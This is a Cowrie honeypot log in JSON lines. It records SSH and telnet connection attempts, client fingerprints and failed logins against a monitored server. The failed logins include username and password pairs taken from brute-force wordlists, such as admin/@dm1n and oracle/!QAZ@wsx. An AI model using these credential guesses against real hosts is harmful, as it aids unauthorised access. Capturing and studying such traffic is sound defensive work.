{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43922,"dst_ip":"1.2.3.4","dst_port":22,"session":"7444ff7c4b4f","protocol":"ssh","message":"New connection: 212.227.235.229:43922 (1.2.3.4:22) [session: 7444ff7c4b4f]","sensor":"my-vps","timestamp":"2025-08-28T00:11:54.331501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:11:54.669139Z","src_ip":"212.227.235.229","session":"7444ff7c4b4f"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:11:54.700907Z","src_ip":"212.227.235.229","session":"7444ff7c4b4f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:11:55.856039Z","src_ip":"212.227.235.229","session":"7444ff7c4b4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43930,"dst_ip":"1.2.3.4","dst_port":22,"session":"2708bba94f0a","protocol":"ssh","message":"New connection: 212.227.235.229:43930 (1.2.3.4:22) [session: 2708bba94f0a]","sensor":"my-vps","timestamp":"2025-08-28T00:11:56.024658Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:11:56.381979Z","src_ip":"212.227.235.229","session":"2708bba94f0a"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:11:56.382684Z","src_ip":"212.227.235.229","session":"2708bba94f0a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:11:57.458965Z","src_ip":"212.227.235.229","session":"2708bba94f0a"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:12:16.015730Z","src_ip":"212.227.125.160","session":"d0614ca135d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45143,"dst_ip":"1.2.3.4","dst_port":23,"session":"0a6528dc752b","protocol":"telnet","message":"New connection: 212.227.235.229:45143 (1.2.3.4:23) [session: 0a6528dc752b]","sensor":"my-vps","timestamp":"2025-08-28T00:12:22.138452Z"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":38912,"dst_ip":"1.2.3.4","dst_port":22,"session":"c901cad53acf","protocol":"ssh","message":"New connection: 194.233.79.134:38912 (1.2.3.4:22) [session: c901cad53acf]","sensor":"my-vps","timestamp":"2025-08-28T00:12:32.611733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:12:32.612638Z","src_ip":"194.233.79.134","session":"c901cad53acf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:12:33.973583Z","src_ip":"194.233.79.134","session":"c901cad53acf"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61134,"dst_ip":"1.2.3.4","dst_port":22,"session":"f67cd84ecd93","protocol":"ssh","message":"New connection: 217.72.205.35:61134 (1.2.3.4:22) [session: f67cd84ecd93]","sensor":"my-vps","timestamp":"2025-08-28T00:12:35.340145Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:12:35.341323Z","src_ip":"217.72.205.35","session":"f67cd84ecd93"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-28T00:12:36.590826Z","src_ip":"194.233.79.134","session":"c901cad53acf"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:12:37.756668Z","src_ip":"194.233.79.134","session":"c901cad53acf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":18183,"dst_ip":"1.2.3.4","dst_port":22,"session":"a54989a6a1a9","protocol":"ssh","message":"New connection: 212.227.125.160:18183 (1.2.3.4:22) [session: a54989a6a1a9]","sensor":"my-vps","timestamp":"2025-08-28T00:12:54.680236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T00:12:54.681290Z","src_ip":"212.227.125.160","session":"a54989a6a1a9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T00:12:54.762138Z","src_ip":"212.227.125.160","session":"a54989a6a1a9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"7933","message":"login attempt [admin/7933] failed","sensor":"my-vps","timestamp":"2025-08-28T00:12:55.181717Z","src_ip":"212.227.125.160","session":"a54989a6a1a9"}
{"eventid":"cowrie.session.closed","duration":33.5452995300293,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:12:55.683650Z","src_ip":"212.227.235.229","session":"0a6528dc752b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"@dm1n","message":"login attempt [admin/@dm1n] failed","sensor":"my-vps","timestamp":"2025-08-28T00:12:56.265685Z","src_ip":"212.227.125.160","session":"a54989a6a1a9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"a","message":"login attempt [admin/a] failed","sensor":"my-vps","timestamp":"2025-08-28T00:12:57.349828Z","src_ip":"212.227.125.160","session":"a54989a6a1a9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1357","message":"login attempt [admin/admin1357] failed","sensor":"my-vps","timestamp":"2025-08-28T00:12:58.432825Z","src_ip":"212.227.125.160","session":"a54989a6a1a9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"apadana5223","message":"login attempt [admin/apadana5223] failed","sensor":"my-vps","timestamp":"2025-08-28T00:12:59.516423Z","src_ip":"212.227.125.160","session":"a54989a6a1a9"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:13:00.600505Z","src_ip":"212.227.125.160","session":"a54989a6a1a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37452,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae7fde1052db","protocol":"ssh","message":"New connection: 212.227.125.160:37452 (1.2.3.4:22) [session: ae7fde1052db]","sensor":"my-vps","timestamp":"2025-08-28T00:14:00.008824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:14:00.010610Z","src_ip":"212.227.125.160","session":"ae7fde1052db"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:14:00.069877Z","src_ip":"212.227.125.160","session":"ae7fde1052db"}
{"eventid":"cowrie.login.failed","username":"sol","password":"1234","message":"login attempt [sol/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:14:00.248767Z","src_ip":"212.227.125.160","session":"ae7fde1052db"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:14:01.312971Z","src_ip":"212.227.125.160","session":"ae7fde1052db"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":58536,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b8642d53bbc","protocol":"ssh","message":"New connection: 194.233.79.134:58536 (1.2.3.4:22) [session: 3b8642d53bbc]","sensor":"my-vps","timestamp":"2025-08-28T00:14:10.079385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:14:10.210146Z","src_ip":"194.233.79.134","session":"3b8642d53bbc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:14:10.333486Z","src_ip":"194.233.79.134","session":"3b8642d53bbc"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-28T00:14:11.789951Z","src_ip":"194.233.79.134","session":"3b8642d53bbc"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:14:13.499482Z","src_ip":"194.233.79.134","session":"3b8642d53bbc"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":41370,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe21b0c6c76c","protocol":"ssh","message":"New connection: 194.233.79.134:41370 (1.2.3.4:22) [session: fe21b0c6c76c]","sensor":"my-vps","timestamp":"2025-08-28T00:15:30.980027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:15:31.209052Z","src_ip":"194.233.79.134","session":"fe21b0c6c76c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:15:31.501223Z","src_ip":"194.233.79.134","session":"fe21b0c6c76c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-28T00:15:32.752174Z","src_ip":"194.233.79.134","session":"fe21b0c6c76c"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:15:35.223412Z","src_ip":"194.233.79.134","session":"fe21b0c6c76c"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":54986,"dst_ip":"1.2.3.4","dst_port":22,"session":"694726af76a7","protocol":"ssh","message":"New connection: 194.233.79.134:54986 (1.2.3.4:22) [session: 694726af76a7]","sensor":"my-vps","timestamp":"2025-08-28T00:17:11.461221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:17:11.462199Z","src_ip":"194.233.79.134","session":"694726af76a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:17:12.093954Z","src_ip":"194.233.79.134","session":"694726af76a7"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-28T00:17:13.920359Z","src_ip":"194.233.79.134","session":"694726af76a7"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:17:15.537382Z","src_ip":"194.233.79.134","session":"694726af76a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43957,"dst_ip":"1.2.3.4","dst_port":23,"session":"f062c0990581","protocol":"telnet","message":"New connection: 212.227.235.229:43957 (1.2.3.4:23) [session: f062c0990581]","sensor":"my-vps","timestamp":"2025-08-28T00:18:00.555831Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49945,"dst_ip":"1.2.3.4","dst_port":23,"session":"3ef320258982","protocol":"telnet","message":"New connection: 212.227.125.160:49945 (1.2.3.4:23) [session: 3ef320258982]","sensor":"my-vps","timestamp":"2025-08-28T00:18:23.654122Z"}
{"eventid":"cowrie.session.closed","duration":30.73152732849121,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:18:31.287289Z","src_ip":"212.227.235.229","session":"f062c0990581"}
{"eventid":"cowrie.session.closed","duration":13.747649908065796,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:18:37.401705Z","src_ip":"212.227.125.160","session":"3ef320258982"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":56838,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d92058d18fd","protocol":"ssh","message":"New connection: 194.233.79.134:56838 (1.2.3.4:22) [session: 4d92058d18fd]","sensor":"my-vps","timestamp":"2025-08-28T00:18:50.873883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:18:51.025352Z","src_ip":"194.233.79.134","session":"4d92058d18fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:18:51.650000Z","src_ip":"194.233.79.134","session":"4d92058d18fd"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T00:18:53.111624Z","src_ip":"194.233.79.134","session":"4d92058d18fd"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:18:54.466180Z","src_ip":"194.233.79.134","session":"4d92058d18fd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58858,"dst_ip":"1.2.3.4","dst_port":22,"session":"8aa4bcc41587","protocol":"ssh","message":"New connection: 217.72.205.35:58858 (1.2.3.4:22) [session: 8aa4bcc41587]","sensor":"my-vps","timestamp":"2025-08-28T00:19:24.643516Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:19:24.644714Z","src_ip":"217.72.205.35","session":"8aa4bcc41587"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41298,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c1a4923265e","protocol":"ssh","message":"New connection: 212.227.125.160:41298 (1.2.3.4:22) [session: 8c1a4923265e]","sensor":"my-vps","timestamp":"2025-08-28T00:20:34.039930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:20:34.040879Z","src_ip":"212.227.125.160","session":"8c1a4923265e"}
